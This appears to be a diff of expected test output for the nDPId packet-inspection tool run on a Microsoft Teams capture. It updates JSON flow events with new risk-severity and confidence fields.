-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041682423,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0HMFAAGwGr7I0ckwwwKgBBgG77ICUvjjErrIu7YAS\/\/+TZQAAAgQFoAEDAwgBAQQC"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041682423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG+H\/AqAEGNHJMMOyAAbuusi7tlL44xVAQIAC0JAAA"}
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587041682440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"ts_msec":1587041682440,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES9AAEARZ+LAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAHT\/ICoAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
-01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
+01495{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041682611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1587041682668,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"ts_msec":1587041682668,"pkt":"EBMx8Tl2KDc3AG3ICABFAABW2rQAAP8RXYrAqAEGwKgBAeC6ADUAQqKILzcBAAABAAAAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1587041682697,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"ts_msec":1587041682697,"pkt":"KDc3AG3IEBMx8Tl2CABFAACny9dAADkR8hbAqAEBwKgBBgA14LoAkwAALzeBgAABAAIAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAASwANRRhLXVwcy1wcmVzZW5jZTQtcHJvZAtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AwEYAAQABAAAABgAENHJNOg=="}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1587041682697,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.58"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1587041682697,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.58"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682698,"flow_last_seen":1587041682698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041682698,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1587041682698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041682698,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG913AqAEGNHJNOuyBAbtgCOGqAAAAALAC\/\/\/jdgAAAgQFtAEDAwUBAQgKMISvtwAAAAAEAgAA"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -174,166 +174,166 @@
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1587041682740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041682740,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwxXAqAEGon0Tg+u4AbuLprsOEqsiiIAQD\/hw3AAAAQEICjCEr+CRzaKr"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041682744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA09YRAAGwG1eQ0ck06wKgBBgG77IG+FZNKYAjhq4AS\/\/+qaAAAAgQFoAEDAwgBAQQC"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041682744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG93XAqAEGNHJNOuyBAbtgCOGrvhWTS1AQIADLJwAA"}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 01282{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1587041682745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":665,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":665,"pkt_l4_len":631,"ts_msec":1587041682745,"pkt":"EBMx8Tl2KDc3AG3ICABFAAKLAABAAEAGwL7AqAEGon0Tg+u4AbuLprsOEqsiiIAYEAA0LgAAAQEICjCEr+ORzaKrFwMDAlK2BaXSajSAVWEKj3frXxijYpT3GD2Cuos6bxaeeEb0O6UJhzmzPZI\/SWy+fgBnTfneCwusduYkx4s3F4xCn2MY3DEvpr\/P48ATzKlJ++OHqI7OI3KpokJ1bF8YwJjJpFyWkPT0\/gdDA2C0thwexYlLgVCHe4dECfAKO3ai6a9AkpIGftSCmWnSsB7\/GodcDd1wDIWHn+mS6A9bTO\/2sRCfLQjmwaqnM\/0Kd1DorrQMm9TT6\/w11NzOyGJGqVRWfthWKCJ2r5CEFaogXR64MxPpr2FM6spcuDUY4C3Hc53Q7uc97BndljPBEgsGGu2WIs1hpBKyBrbp4cakeWFrgRHILDge\/JLjoB\/we0ie6rPfHdzAzbH+CVHboc7ECVvIV6N2Rd\/z5fI6cJ5y1i\/CGpe9JS\/DjF+npNlL3gVvBs3y7VpT4ziTRBRlbzG6hzfaYWVE\/I1GNwloup0kRP0\/\/fFg59buQBmTxdHJsfm4laPDQEGg2\/E9TD5wbcmagME1tYB8Z6HaDDAe1MbrBXtLSM8VMS0ZeI23LZfgw6dIscXGQh+EZCVohYQ2K\/dCOtZqYIGlXsZd11O+bX\/KPVaVnsGCQqimWVbYkJXTdkE5fdL4ibwUdj8vI7+8IXUv8oArxAdVEWB2+pth6d9Zti7C4SxMlmajA50jkJHElO8G4w6Wzb86qkyK4WbkuYLazUSRxEvrQrVtZjtDDcEAhbB3i\/CCiXoyK9403MAI7UV+NXn0+Iqmacnoi+GSVKkccDjbrlFQ3qxHSBpnh\/Zt22FSB4TV4eA="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682809,"flow_last_seen":1587041682809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041682809,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1587041682809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041682809,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyCEVImrEWfAAAAALAC\/\/+rgAAAAgQFtAEDAwUBAQgKMISwIQAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1587041682862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041682862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7ILLfLe3JqxFoKAS\/ogNbwAAAgQFrAQCCAoTeRnVMISwIQEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1587041682862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041682862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyCEVImrEWgy3y3uIAQECwqYQAAAQEICjCEsFATeRnV"}
-00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00840{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1439,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682698,"flow_last_seen":1587041683109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9547,"flow_avg_l4_payload_len":298,"midstream":0,"ts_msec":1587041683109,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01033{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
